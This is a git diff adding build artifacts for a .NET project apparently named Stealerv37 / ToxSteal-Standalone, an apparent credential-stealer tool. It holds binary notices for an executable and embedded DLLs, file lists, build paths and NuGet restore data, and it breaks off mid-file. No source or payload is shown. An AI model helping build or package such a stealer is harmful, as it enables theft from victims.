a/New/obj/Release/net462/Costura/A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed b/New/obj/Release/net462/Costura/A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed new file mode 100644 index 0000000..66099ec Binary files /dev/null and b/New/obj/Release/net462/Costura/A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed new file mode 100644 index 0000000..83265aa Binary files /dev/null and b/New/obj/Release/net462/Costura/AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed b/New/obj/Release/net462/Costura/B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed new file mode 100644 index 0000000..f2bcf87 Binary files /dev/null and b/New/obj/Release/net462/Costura/B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed b/New/obj/Release/net462/Costura/B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed new file mode 100644 index 0000000..10c0ce3 Binary files /dev/null and b/New/obj/Release/net462/Costura/B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed b/New/obj/Release/net462/Costura/B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed new file mode 100644 index 0000000..07f0839 Binary files /dev/null and b/New/obj/Release/net462/Costura/B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed b/New/obj/Release/net462/Costura/BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed new file mode 100644 index 0000000..fc6ed68 Binary files /dev/null and b/New/obj/Release/net462/Costura/BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed b/New/obj/Release/net462/Costura/C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed new file mode 100644 index 0000000..ae4fdcb Binary files /dev/null and b/New/obj/Release/net462/Costura/C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed b/New/obj/Release/net462/Costura/F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed new file mode 100644 index 0000000..113157e Binary files /dev/null and b/New/obj/Release/net462/Costura/F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Stealerv37.exe b/New/obj/Release/net462/Stealerv37.exe new file mode 100755 index 0000000..5b3d9b2 Binary files /dev/null and b/New/obj/Release/net462/Stealerv37.exe differ diff --git a/New/obj/Release/net462/Stealerv37.exe.config b/New/obj/Release/net462/Stealerv37.exe.config new file mode 100644 index 0000000..ab21881 --- /dev/null +++ b/New/obj/Release/net462/Stealerv37.exe.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/New/obj/Release/net462/Stealerv37.exe.withSupportedRuntime.config b/New/obj/Release/net462/Stealerv37.exe.withSupportedRuntime.config new file mode 100644 index 0000000..ab21881 --- /dev/null +++ b/New/obj/Release/net462/Stealerv37.exe.withSupportedRuntime.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/New/obj/Release/net462/Stealerv37.pdb b/New/obj/Release/net462/Stealerv37.pdb new file mode 100644 index 0000000..73d91b0 Binary files /dev/null and b/New/obj/Release/net462/Stealerv37.pdb differ diff --git a/New/obj/Release/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig b/New/obj/Release/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig new file mode 100644 index 0000000..32bec4c --- /dev/null +++ b/New/obj/Release/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig @@ -0,0 +1,14 @@ +is_global = true +build_property.ApplicationManifest = app.manifest +build_property.StartupObject = +build_property.ApplicationDefaultFont = +build_property.ApplicationHighDpiMode = +build_property.ApplicationUseCompatibleTextRendering = +build_property.ApplicationVisualStyles = +build_property.RootNamespace = aoStealerv35_c6 +build_property.ProjectDir = C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\ +build_property.EnableComHosting = +build_property.EnableGeneratedComInterfaceComImportInterop = +build_property.CsWinRTUseWindowsUIXamlProjections = false +build_property.EffectiveAnalysisLevelStyle = +build_property.EnableCodeStyleSeverity = diff --git a/New/obj/Release/net462/aoStealerv35_c6.assets.cache b/New/obj/Release/net462/aoStealerv35_c6.assets.cache new file mode 100644 index 0000000..5aefa9c Binary files /dev/null and b/New/obj/Release/net462/aoStealerv35_c6.assets.cache differ diff --git a/New/obj/Release/net462/aoStealerv35_c6.csproj.AssemblyReference.cache b/New/obj/Release/net462/aoStealerv35_c6.csproj.AssemblyReference.cache new file mode 100644 index 0000000..e6a3fc2 Binary files /dev/null and b/New/obj/Release/net462/aoStealerv35_c6.csproj.AssemblyReference.cache differ diff --git a/New/obj/Release/net462/aoStealerv35_c6.csproj.CoreCompileInputs.cache b/New/obj/Release/net462/aoStealerv35_c6.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..a71c7a7 --- /dev/null +++ b/New/obj/Release/net462/aoStealerv35_c6.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +67a4e5ca838b08a210cc3b179583e99bb5f5eced848278dcfdb738b0f0c8b634 diff --git a/New/obj/Release/net462/aoStealerv35_c6.csproj.FileListAbsolute.txt b/New/obj/Release/net462/aoStealerv35_c6.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..4d0cbf8 --- /dev/null +++ b/New/obj/Release/net462/aoStealerv35_c6.csproj.FileListAbsolute.txt @@ -0,0 +1,38 @@ +C:\Users\toxi\Desktop\gg\stealerv37\Builds\Stealerv37.exe.config +C:\Users\toxi\Desktop\gg\stealerv37\Builds\Stealerv37.exe +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\aoStealerv35_c6.csproj.AssemblyReference.cache +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\aoStealerv35_c6.csproj.CoreCompileInputs.cache +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.CopyLocal.cache +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache +C:\Users\toxi\Desktop\gg\stealerv37\New\obj\Release\net462\Stealerv37.exe +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\Builds\Stealerv37.exe.config +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\Builds\Stealerv37.exe +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.AssemblyReference.cache +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.CoreCompileInputs.cache +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.CopyLocal.cache +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache +C:\Users\toxi\Desktop\gg\ToxSteal-Standalonev1-working\ToxSteal-Standalone\New\obj\Release\net462\Stealerv37.exe +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\bin\Release\net462\Stealerv37.exe.config +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\bin\Release\net462\Stealerv37.exe +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\bin\Release\net462\Stealerv37.pdb +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.AssemblyReference.cache +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.CoreCompileInputs.cache +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.CopyLocal.cache +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\Stealerv37.exe +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\Stealerv37.pdb +C:\Users\User\Downloads\Telegram Desktop\ToxSteal-Standalone-working-v2\ToxSteal-Standalone\New\obj\Release\net462\Stealerv37.exe.config +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\bin\Release\net462\Stealerv37.exe.config +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\bin\Release\net462\Stealerv37.exe +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\bin\Release\net462\Stealerv37.pdb +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\aoStealerv35_c6.csproj.AssemblyReference.cache +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\Stealerv37.exe.config +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\aoStealerv35_c6.csproj.CoreCompileInputs.cache +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.CopyLocal.cache +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\Stealerv37.exe +C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\obj\Release\net462\Stealerv37.pdb diff --git a/New/obj/Release/net462/aoStealerv35_c6.csproj.Fody.CopyLocal.cache b/New/obj/Release/net462/aoStealerv35_c6.csproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..e69de29 diff --git a/New/obj/Release/net462/aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache b/New/obj/Release/net462/aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache new file mode 100644 index 0000000..cd4a29e --- /dev/null +++ b/New/obj/Release/net462/aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache @@ -0,0 +1,24 @@ +C:\Users\User\.nuget\packages\microsoft.win32.primitives\4.3.0\lib\net46\Microsoft.Win32.Primitives.dll +C:\Users\User\.nuget\packages\newtonsoft.json\13.0.3\lib\net45\Newtonsoft.Json.dll +C:\Users\User\.nuget\packages\system.appcontext\4.3.0\lib\net46\System.AppContext.dll +C:\Users\User\.nuget\packages\system.console\4.3.0\lib\net46\System.Console.dll +C:\Users\User\.nuget\packages\system.diagnostics.diagnosticsource\4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll +C:\Users\User\.nuget\packages\system.diagnostics.tracing\4.3.0\lib\net462\System.Diagnostics.Tracing.dll +C:\Users\User\.nuget\packages\system.globalization.calendars\4.3.0\lib\net46\System.Globalization.Calendars.dll +C:\Users\User\.nuget\packages\system.io\4.3.0\lib\net462\System.IO.dll +C:\Users\User\.nuget\packages\system.io.compression\4.3.0\runtimes\win\lib\net46\System.IO.Compression.dll +C:\Users\User\.nuget\packages\system.io.compression.zipfile\4.3.0\lib\net46\System.IO.Compression.ZipFile.dll +C:\Users\User\.nuget\packages\system.io.filesystem\4.3.0\lib\net46\System.IO.FileSystem.dll +C:\Users\User\.nuget\packages\system.io.filesystem.primitives\4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll +C:\Users\User\.nuget\packages\system.net.http\4.3.0\runtimes\win\lib\net46\System.Net.Http.dll +C:\Users\User\.nuget\packages\system.net.sockets\4.3.0\lib\net46\System.Net.Sockets.dll +C:\Users\User\.nuget\packages\system.reflection\4.3.0\lib\net462\System.Reflection.dll +C:\Users\User\.nuget\packages\system.runtime\4.3.0\lib\net462\System.Runtime.dll +C:\Users\User\.nuget\packages\system.runtime.extensions\4.3.0\lib\net462\System.Runtime.Extensions.dll +C:\Users\User\.nuget\packages\system.runtime.interopservices\4.3.0\lib\net462\System.Runtime.InteropServices.dll +C:\Users\User\.nuget\packages\system.runtime.interopservices.runtimeinformation\4.3.0\runtimes\win\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll +C:\Users\User\.nuget\packages\system.security.cryptography.algorithms\4.3.0\runtimes\win\lib\net461\System.Security.Cryptography.Algorithms.dll +C:\Users\User\.nuget\packages\system.security.cryptography.encoding\4.3.0\runtimes\win\lib\net46\System.Security.Cryptography.Encoding.dll +C:\Users\User\.nuget\packages\system.security.cryptography.primitives\4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll +C:\Users\User\.nuget\packages\system.security.cryptography.x509certificates\4.3.0\runtimes\win\lib\net461\System.Security.Cryptography.X509Certificates.dll +C:\Users\User\.nuget\packages\system.xml.readerwriter\4.3.0\lib\net46\System.Xml.ReaderWriter.dll diff --git a/New/obj/aoStealerv35_c6.csproj.nuget.dgspec.json b/New/obj/aoStealerv35_c6.csproj.nuget.dgspec.json new file mode 100644 index 0000000..a826717 --- /dev/null +++ b/New/obj/aoStealerv35_c6.csproj.nuget.dgspec.json @@ -0,0 +1,86 @@ +{ + "format": 1, + "restore": { + "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj": {} + }, + "projects": { + "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj": { + "version": "1.0.0", + "restore": { + "projectUniqueName": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "projectName": "Stealerv37", + "projectPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "packagesPath": "C:\\Users\\User\\.nuget\\packages\\", + "outputPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\obj\\", + "projectStyle": "PackageReference", + "fallbackFolders": [ + "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages" + ], + "configFilePaths": [ + "C:\\Users\\User\\AppData\\Roaming\\NuGet\\NuGet.Config", + "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config", + "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" + ], + "originalTargetFrameworks": [ + "net462" + ], + "sources": { + "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, + "https://api.nuget.org/v3/index.json": {} + }, + "frameworks": { + "net462": { + "targetAlias": "net462", + "projectReferences": {} + } + }, + "warningProperties": { + "warnAsError": [ + "NU1605" + ] + }, + "restoreAuditProperties": { + "enableAudit": "true", + "auditLevel": "low", + "auditMode": "direct" + }, + "SdkAnalysisLevel": "10.0.100" + }, + "frameworks": { + "net462": { + "targetAlias": "net462", + "dependencies": { + "Costura.Fody": { + "include": "Runtime, Build, Native, ContentFiles, Analyzers, BuildTransitive", + "suppressParent": "All", + "target": "Package", + "version": "[5.7.0, )" + }, + "Fody": { + "include": "Runtime, Build, Native, ContentFiles, Analyzers, BuildTransitive", + "suppressParent": "All", + "target": "Package", + "version": "[6.8.0, )" + }, + "Microsoft.NETFramework.ReferenceAssemblies": { + "suppressParent": "All", + "target": "Package", + "version": "[1.0.3, )", + "autoReferenced": true + }, + "Newtonsoft.Json": { + "target": "Package", + "version": "[13.0.3, )" + } + }, + "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\10.0.101\\RuntimeIdentifierGraph.json" + } + }, + "runtimes": { + "win-x64": { + "#import": [] + } + } + } + } +} \ No newline at end of file diff --git a/New/obj/aoStealerv35_c6.csproj.nuget.g.props b/New/obj/aoStealerv35_c6.csproj.nuget.g.props new file mode 100644 index 0000000..a21a561 --- /dev/null +++ b/New/obj/aoStealerv35_c6.csproj.nuget.g.props @@ -0,0 +1,19 @@ + + + + True + NuGet + $(MSBuildThisFileDirectory)project.assets.json + $(UserProfile)\.nuget\packages\ + C:\Users\User\.nuget\packages\;C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages + PackageReference + 6.14.2 + + + + + + + + + \ No newline at end of file diff --git a/New/obj/aoStealerv35_c6.csproj.nuget.g.targets b/New/obj/aoStealerv35_c6.csproj.nuget.g.targets new file mode 100644 index 0000000..32576f1 --- /dev/null +++ b/New/obj/aoStealerv35_c6.csproj.nuget.g.targets @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/New/obj/project.assets.json b/New/obj/project.assets.json new file mode 100644 index 0000000..569e795 --- /dev/null +++ b/New/obj/project.assets.json @@ -0,0 +1,4596 @@ +{ + "version": 3, + "targets": { + ".NETFramework,Version=v4.6.2": { + "Costura.Fody/5.7.0": { + "type": "package", + "dependencies": { + "Fody": "6.5.5", + "NETStandard.Library": "1.6.1" + }, + "compile": { + "lib/netstandard1.0/_._": { + "related": ".pdb;.xml" + } + }, + "runtime": { + "lib/netstandard1.0/Costura.dll": { + "related": ".pdb;.xml" + } + }, + "build": { + "build/Costura.Fody.props": {}, + "build/Costura.Fody.targets": {} + } + }, + "Fody/6.8.0": { + "type": "package", + "build": { + "build/Fody.targets": {} + } + }, + "Microsoft.NETCore.Platforms/1.1.0": { + "type": "package", + "compile": { + "lib/netstandard1.0/_._": {} + }, + "runtime": { + "lib/netstandard1.0/_._": {} + } + }, + "Microsoft.NETFramework.ReferenceAssemblies/1.0.3": { + "type": "package", + "dependencies": { + "Microsoft.NETFramework.ReferenceAssemblies.net462": "1.0.3" + } + }, + "Microsoft.NETFramework.ReferenceAssemblies.net462/1.0.3": { + "type": "package", + "build": { + "build/Microsoft.NETFramework.ReferenceAssemblies.net462.targets": {} + } + }, + "Microsoft.Win32.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/Microsoft.Win32.Primitives.dll": {} + } + }, + "NETStandard.Library/1.6.1": { + "type": "package", + "dependencies": { + "Microsoft.NETCore.Platforms": "1.1.0", + "Microsoft.Win32.Primitives": "4.3.0", + "System.AppContext": "4.3.0", + "System.Collections": "4.3.0", + "System.Collections.Concurrent": "4.3.0", + "System.Console": "4.3.0", + "System.Diagnostics.Debug": "4.3.0", + "System.Diagnostics.Tools": "4.3.0", + "System.Diagnostics.Tracing": "4.3.0", + "System.Globalization": "4.3.0", + "System.Globalization.Calendars": "4.3.0", + "System.IO": "4.3.0", + "System.IO.Compression": "4.3.0", + "System.IO.Compression.ZipFile": "4.3.0", + "System.IO.FileSystem": "4.3.0", + "System.IO.FileSystem.Primitives": "4.3.0", + "System.Linq": "4.3.0", + "System.Linq.Expressions": "4.3.0", + "System.Net.Http": "4.3.0", + "System.Net.Primitives": "4.3.0", + "System.Net.Sockets": "4.3.0", + "System.ObjectModel": "4.3.0", + "System.Reflection": "4.3.0", + "System.Reflection.Extensions": "4.3.0", + "System.Reflection.Primitives": "4.3.0", + "System.Resources.ResourceManager": "4.3.0", + "System.Runtime": "4.3.0", + "System.Runtime.Extensions": "4.3.0", + "System.Runtime.Handles": "4.3.0", + "System.Runtime.InteropServices": "4.3.0", + "System.Runtime.InteropServices.RuntimeInformation": "4.3.0", + "System.Runtime.Numerics": "4.3.0", + "System.Security.Cryptography.Algorithms": "4.3.0", + "System.Security.Cryptography.Encoding": "4.3.0", + "System.Security.Cryptography.Primitives": "4.3.0", + "System.Security.Cryptography.X509Certificates": "4.3.0", + "System.Text.Encoding": "4.3.0", + "System.Text.Encoding.Extensions": "4.3.0", + "System.Text.RegularExpressions": "4.3.0", + "System.Threading": "4.3.0", + "System.Threading.Tasks": "4.3.0", + "System.Threading.Timer": "4.3.0", + "System.Xml.ReaderWriter": "4.3.0", + "System.Xml.XDocument": "4.3.0" + } + }, + "Newtonsoft.Json/13.0.3": { + "type": "package", + "compile": { + "lib/net45/Newtonsoft.Json.dll": { + "related": ".xml" + } + }, + "runtime": { + "lib/net45/Newtonsoft.Json.dll": { + "related": ".xml" + } + } + }, + "System.AppContext/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.AppContext.dll": {} + } + }, + "System.Collections/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Collections.Concurrent/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Console/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Console.dll": {} + } + }, + "System.Diagnostics.Debug/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Diagnostics.DiagnosticSource/4.3.0": { + "type": "package", + "compile": { + "lib/net46/_._": { + "related": ".xml" + } + }, + "runtime": { + "lib/net46/System.Diagnostics.DiagnosticSource.dll": { + "related": ".xml" + } + } + }, + "System.Diagnostics.Tools/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Diagnostics.Tracing/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Diagnostics.Tracing.dll": {} + } + }, + "System.Globalization/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Globalization.Calendars/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Globalization.Calendars.dll": {} + } + }, + "System.IO/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.IO.dll": {} + } + }, + "System.IO.Compression/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.Compression.dll": {} + }, + "runtimeTargets": { + "runtimes/unix/lib/netstandard1.3/System.IO.Compression.dll": { + "assetType": "runtime", + "rid": "unix" + }, + "runtimes/win/lib/net46/System.IO.Compression.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.IO.Compression.ZipFile/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.IO.Compression.FileSystem", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.Compression.ZipFile.dll": {} + } + }, + "System.IO.FileSystem/4.3.0": { + "type": "package", + "dependencies": { + "System.IO.FileSystem.Primitives": "4.3.0" + }, + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.FileSystem.dll": {} + } + }, + "System.IO.FileSystem.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.FileSystem.Primitives.dll": {} + } + }, + "System.Linq/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Linq.Expressions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Net.Http/4.3.0": { + "type": "package", + "dependencies": { + "System.Diagnostics.DiagnosticSource": "4.3.0", + "System.Security.Cryptography.X509Certificates": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net46/_._": { + "related": ".xml" + } + }, + "runtime": { + "lib/net46/System.Net.Http.dll": {} + }, + "runtimeTargets": { + "runtimes/unix/lib/netstandard1.6/System.Net.Http.dll": { + "assetType": "runtime", + "rid": "unix" + }, + "runtimes/win/lib/net46/System.Net.Http.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.Net.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Net.Sockets/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Net.Sockets.dll": {} + } + }, + "System.ObjectModel/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Reflection/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Reflection.dll": {} + } + }, + "System.Reflection.Extensions/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Reflection.Primitives/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Resources.ResourceManager/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Runtime/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.ComponentModel.Composition", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.dll": {} + } + }, + "System.Runtime.Extensions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.Extensions.dll": {} + } + }, + "System.Runtime.Handles/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/_._": {} + } + }, + "System.Runtime.InteropServices/4.3.0": { + "type": "package", + "dependencies": { + "System.Runtime": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.InteropServices.dll": {} + } + }, + "System.Runtime.InteropServices.RuntimeInformation/4.3.0": { + "type": "package", + "compile": { + "ref/netstandard1.1/_._": {} + }, + "runtime": { + "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll": {} + }, + "runtimeTargets": { + "runtimes/unix/lib/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll": { + "assetType": "runtime", + "rid": "unix" + }, + 